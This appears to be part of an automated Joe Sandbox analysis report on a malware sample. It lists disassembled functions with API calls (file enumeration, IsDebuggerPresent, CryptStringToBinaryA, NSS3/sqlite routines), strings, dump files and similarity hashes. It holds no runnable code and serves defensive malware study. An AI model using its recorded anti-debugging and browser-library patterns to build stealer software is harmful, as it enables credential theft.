
APIs

memcpy.VCRUNTIME140(?,?,00000020), ref: 6CF91F19
memcpy.VCRUNTIME140(?,?,00000020), ref: 6CF92166
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CF9228F
memcpy.VCRUNTIME140(?,?,00000010), ref: 6CF923B8
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CF9241C

Strings

serial, xrefs: 6CF922A2
manufacturer, xrefs: 6CF92179
model, xrefs: 6CF923CB, 6CF923EC
token, xrefs: 6CF91F2C

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memcpy$Error
String ID: manufacturer$model$serial$token
API String ID: 3204416626-1906384322
Opcode ID: 9bfe56b8eb9b9c91a8adf4c181fa766aa2fca57d7ec27e8754f17cc979630a25
Instruction ID: 00cd4e0957df4573c5565cfb518e045a027da5f3821383edafe8652085a61384
Opcode Fuzzy Hash: 9bfe56b8eb9b9c91a8adf4c181fa766aa2fca57d7ec27e8754f17cc979630a25
Instruction Fuzzy Hash: 51022EA2E0C7CC6EFB318671C84C7D77AE49B4532CF1D166EC6DE46683C3A959888352

Function 0040DF10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C32), ref: 0040DF5E
StrCmpCA.SHLWAPI(?,004215C0), ref: 0040DFAE
StrCmpCA.SHLWAPI(?,004215C4), ref: 0040DFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040E4E0
FindClose.KERNEL32(000000FF), ref: 0040E4F2

Strings

\*.*, xrefs: 0040DF26
4@, xrefs: 0040DF32, 0040E500, 0040DFF3, 0040DF75, 0040DFF6

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: 4@$\*.*
API String ID: 2325840235-1993203227
Opcode ID: dc035998f4602c58846bc0fe385c0bf1cdbc2cc80f2be4234bdc297cb0698cb4
Instruction ID: 5b1d21d8256b1a4f75019a03d5e94b0e3f490a8b44af3c5bb40891ece502d815
Opcode Fuzzy Hash: dc035998f4602c58846bc0fe385c0bf1cdbc2cc80f2be4234bdc297cb0698cb4
Instruction Fuzzy Hash: F6F14D71A151189ACB25EB61DCA5EEE7339AF14314F4005EFB10A62091EF387BD8CF5A

Function 6CF96C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CF41C6F,00000000,00000004,?,?), ref: 6CF96C3F

Part of subcall function 6CFEC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CFEC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6CF41C6F,00000000,00000004,?,?), ref: 6CF96C60
PR_ExplodeTime.NSS3(00000000,6CF41C6F,?,?,?,?,?,00000000,00000000,00000000,?,6CF41C6F,00000000,00000004,?,?), ref: 6CF96C94

Strings

gfff, xrefs: 6CF96CF5
gfff, xrefs: 6CF96D9C
gfff, xrefs: 6CF96CFD
gfff, xrefs: 6CF96D66
gfff, xrefs: 6CF96D30

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 2670a1b336f0474f0848dbfed3bfa5b5f5956d381e3e47f470569179ceeef922
Instruction ID: 189c0b88e0bac9b00df972feebf38c283b86eab58e9a786300d854ce39b13f78
Opcode Fuzzy Hash: 2670a1b336f0474f0848dbfed3bfa5b5f5956d381e3e47f470569179ceeef922
Instruction Fuzzy Hash: E8513B72B016494FD708CEADDC527DEBBDAABA4310F48C23AE842DB781D678D906C751

Function 6D010F20 Relevance: 15.4, APIs: 3, Strings: 7, Instructions: 394stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,-00000001), ref: 6D011027
memcpy.VCRUNTIME140(?,?,00000000), ref: 6D0110B2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D011353

Strings

-- , xrefs: 6D010FF5
NULL, xrefs: 6D01119E
%02x, xrefs: 6D0112F6
%lld, xrefs: 6D01114B
'%.*q', xrefs: 6D011217, 6D011292
$, xrefs: 6D0112A0
zeroblob(%d), xrefs: 6D011223

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memcpy$strlen
String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
API String ID: 2619041689-2155869073
Opcode ID: f9238f8888fa2722526030aea2c289ca9385da7405e1f36dcfa27566aef73e49
Instruction ID: 90151c48a2b4db934c6ddba69ad6680a7e4daf275a711460e3521096b2a41923
Opcode Fuzzy Hash: f9238f8888fa2722526030aea2c289ca9385da7405e1f36dcfa27566aef73e49
Instruction Fuzzy Hash: BFE18A7190C3419BE709CF98C880B6EBBF5BF9A344F44882DE9958B255E771E845CB43

Function 6CEDAEC0 Relevance: 13.7, APIs: 9, Instructions: 242COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,00000002,?,6CFFCF46,?,6CECCDBD,?,6CFFBF31,?,?,?,?,?,?,?), ref: 6CEDB039
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CFFCF46,?,6CECCDBD,?,6CFFBF31), ref: 6CEDB090
sqlite3_free.NSS3(?,?,?,?,?,?,6CFFCF46,?,6CECCDBD,?,6CFFBF31), ref: 6CEDB0A2
CloseHandle.KERNEL32(?,?,6CFFCF46,?,6CECCDBD,?,6CFFBF31,?,?,?,?,?,?,?,?,?), ref: 6CEDB100
sqlite3_free.NSS3(?,?,00000002,?,6CFFCF46,?,6CECCDBD,?,6CFFBF31,?,?,?,?,?,?,?), ref: 6CEDB115
sqlite3_free.NSS3(?,?,?,?,?,?,6CFFCF46,?,6CECCDBD,?,6CFFBF31), ref: 6CEDB12D

Part of subcall function 6CEC9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6CEDC6FD,?,?,?,?,6CF2F965,00000000), ref: 6CEC9F0E
Part of subcall function 6CEC9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6CF2F965,00000000), ref: 6CEC9F5D

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
String ID:
API String ID: 3155957115-0
Opcode ID: 004c5bf4a39a6494577dd2ce79a9f0fd49be9bcbae082c0264f8cddf6570852d
Instruction ID: 0a241cc4bd10ef9cc488d6c458168641404c00716b16c24e845829dda4441c58
Opcode Fuzzy Hash: 004c5bf4a39a6494577dd2ce79a9f0fd49be9bcbae082c0264f8cddf6570852d
Instruction Fuzzy Hash: 5391BFB1A042058FEB04CF24C885B6EB7B1FF85308F2A462DE41697750EB31F982CB52

Function 6CFABD30 Relevance: 13.6, APIs: 9, Instructions: 102COMMON

Download Yara Rule

APIs

NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CFABD48
NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6CFABD68
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CFABD83
NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6CFABD9E
NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6CFABDB9
NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6CFABDD0
NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6CFABDEA
NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6CFABE04
NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6CFABE1E

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: AlgorithmPolicy
String ID:
API String ID: 2721248240-0
Opcode ID: 5e534cfd4ce314e3b71ddf358d31f5b13fcec39795c2ab69c4dc855162368eaf
Instruction ID: baac175a0beea5b6a183dcf47a599792988b0f6d539cabdf2565619b6739581c
Opcode Fuzzy Hash: 5e534cfd4ce314e3b71ddf358d31f5b13fcec39795c2ab69c4dc855162368eaf
Instruction Fuzzy Hash: 1721A576E0429DD7FB0046D6AC83FCBF2749B9274DF080914F917EE741E750981687A6

Function 6D058D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D0A14E4,6D00CC70), ref: 6D058D47
PR_GetCurrentThread.NSS3 ref: 6D058D98

Part of subcall function 6CF30F00: PR_GetPageSize.NSS3(6CF30936,FFFFE8AE,?,6CEC16B7,00000000,?,6CF30936,00000000,?,6CEC204A), ref: 6CF30F1B
Part of subcall function 6CF30F00: PR_NewLogModule.NSS3(clock,6CF30936,FFFFE8AE,?,6CEC16B7,00000000,?,6CF30936,00000000,?,6CEC204A), ref: 6CF30F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6D058E7B
htons.WSOCK32(?), ref: 6D058EDB
PR_GetCurrentThread.NSS3 ref: 6D058F99
PR_GetCurrentThread.NSS3 ref: 6D05910A

Strings

%u.%u.%u.%u, xrefs: 6D058E74

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: da71abede1be7d433df3aa541636ad0e00c079db770a19ec2f88e6cad408fb8e
Instruction ID: 19a86d3aa2b1ea6ee4e75658798013dc16e656112d5701366e8f6034f73f4139
Opcode Fuzzy Hash: da71abede1be7d433df3aa541636ad0e00c079db770a19ec2f88e6cad408fb8e
Instruction Fuzzy Hash: A70298719052628FFB198F19C66877ABBF2EF8A300F09C259DC915B292C331D999C790

Function 6CFF9C40 Relevance: 11.1, APIs: 3, Strings: 3, Instructions: 565COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,00000000,6CECC52B), ref: 6CFF9D53
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00014960,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CFFA035
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000149AD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CFFA114

Strings

%s at line %d of [%.10s], xrefs: 6CFFA02E, 6CFFA10D
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CFFA01F, 6CFFA0E4, 6CFFA0FE
database corruption, xrefs: 6CFFA029, 6CFFA108

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: sqlite3_log$memcmp
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 717804543-598938438
Opcode ID: 48300d4a7b681ff35d04ac472b8b0071d5df1c02c7feaef9825958892ff04382
Instruction ID: a5b9d22b51b711f4297bfe2d96fa59594bdd23bfa7b934ad7e341026dbc8ff91
Opcode Fuzzy Hash: 48300d4a7b681ff35d04ac472b8b0071d5df1c02c7feaef9825958892ff04382
Instruction Fuzzy Hash: 6B22AD7160C3418FD704CF29C49062BBBE1FF8A344F148A2DE9EA976A1DB31D946CB52

Function 0041B63A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041BEA2
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041BEB7
UnhandledExceptionFilter.KERNEL32(eM), ref: 0041BEC2
GetCurrentProcess.KERNEL32(C0000409), ref: 0041BEDE
TerminateProcess.KERNEL32(00000000), ref: 0041BEE5

Strings

eM, xrefs: 0041BEBD

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID: eM
API String ID: 2579439406-4107679315
Opcode ID: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction ID: e0cf9fd370cfefa4586a3e07c7ad2671862445e1fb84a52232205764a1bb9e34
Opcode Fuzzy Hash: 193660ad69945e5d4e8f2537fb9143e859482eb6e3c007ea4e683d192d75b70a
Instruction Fuzzy Hash: FC21CCB8902214DFC710DF69FC85A883BB4FB18314F12807BE90887262E7B499818F5D

Function 6D019D90 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,6CED8637,?,?), ref: 6D019E88
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011166,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,?,?,6CED8637), ref: 6D019ED6

Strings

%s at line %d of [%.10s], xrefs: 6D019ECF
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6D019EC0
database corruption, xrefs: 6D019ECA

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 767388123f48853ac28de2df6b1c287027ed09d4cc110f939acc541e1550fccf
Instruction ID: a7d3696f9b380e259bd904591729640867339a275061795bd75e5deae0666867
Opcode Fuzzy Hash: 767388123f48853ac28de2df6b1c287027ed09d4cc110f939acc541e1550fccf
Instruction Fuzzy Hash: AF818231B042169FEB04CFA9DD80BEEB7F6BF48300B558569E929AB241D731EE45CB50

Function 0040A210 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F

Strings

>O@, xrefs: 0040A224, 0040A231, 0040A249, 0040A268, 0040A234, 0040A26B

Memory Dump Source

Source File: 00000000.00000002.1907555861.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1907555861.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1907555861.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DbMBWMxoNv.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: >O@
API String ID: 4291131564-3498640338
Opcode ID: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction ID: de78b312e53d8eb1032a325daaba17a5ad67a9fc4c37dbc2dcfee383a82f1a49
Opcode Fuzzy Hash: edccb5067cb49db7a5de6f654d3a134b15aae92a07ed0db144d4c911c0eb6ceb
Instruction Fuzzy Hash: 3B11D474641308AFEB10CF64DC95FAA77B5EB88B04F208099FD159B3D0C776AA41CB50

Function 6D027F20 Relevance: 7.7, APIs: 2, Strings: 2, Instructions: 713COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(00000000,00000000,?), ref: 6D0281BC

Strings

out of memory, xrefs: 6D02835B
BINARY, xrefs: 6D028126

Memory Dump Source

Source File: 00000000.00000002.1929422284.000000006CEC1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6CEC0000, based on PE: true

Associated: 00000000.00000002.1929393808.000000006CEC0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929573243.000000006D05F000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929622074.000000006D09E000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929650509.000000006D09F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929679411.000000006D0A0000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000000.00000002.1929708396.000000006D0A5000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cec0000_DbMBWMxoNv.jbxd

Similarity

API ID: memset
String ID: BINARY$out of memory
API String ID: 2221118986-3971123528
Opcode ID: bc27b03d89670981a0bf2be3093696656bc616e047f0046e25b21039ab95d8f4
Instruction ID: 7dab93ee1c24fcaa12380a38beb6af53515ca45487be12c686000ba4b41f97e3
Opcode Fuzzy Hash: bc27b03d89670981a0bf2be3093696656bc616e047f0046e25b21039ab95d8f4
Instruction Fuzzy Hash: EA52AC75E05219DFEB14CF98C880BAEBBF2FF88314F158069D859AB351D730A846CB90

Function 6CFA9EC0 Relevance: 7.6, APIs: 5, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CFA9ED6

Part of subcall function 6CFA14C0: TlsGetValue.KERNEL32 ref: 6CFA14E0
Part of subcall function 6CFA14C0: EnterCriticalSection.KERNEL32 ref: 6CFA14F5
Part of subcall function 6CFA14C0: PR_Unlock.NSS3 ref: 6CFA150D

PORT_ArenaAlloc_Util.NSS3(?,00000024), ref: 6CFA9EE4

Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA10F3
Part of subcall function 6CFA10C0: EnterCriticalSection.KERNEL32(?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA110C
Part of subcall function 6CFA10C0: PL_ArenaAllocate.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1141
Part of subcall function 6CFA10C0: PR_Unlock.NSS3(?,?,?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA1182
Part of subcall function 6CFA10C0: TlsGetValue.KERNEL32(?,6CF48802,00000000,00000008,?,6CF3EF74,00000000), ref: 6CFA119C

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CFA9F38

Part of subcall function 6CFAD030: PORT_NewArena_Util.NSS3(00000400,00000000,?,00000000,?,6CFA9F0B), ref: 6CFAD03B
Part of subcall function 6CFAD030: PORT_ArenaAlloc_Util.NSS3(00000000,00000028), ref: 6CFAD04E
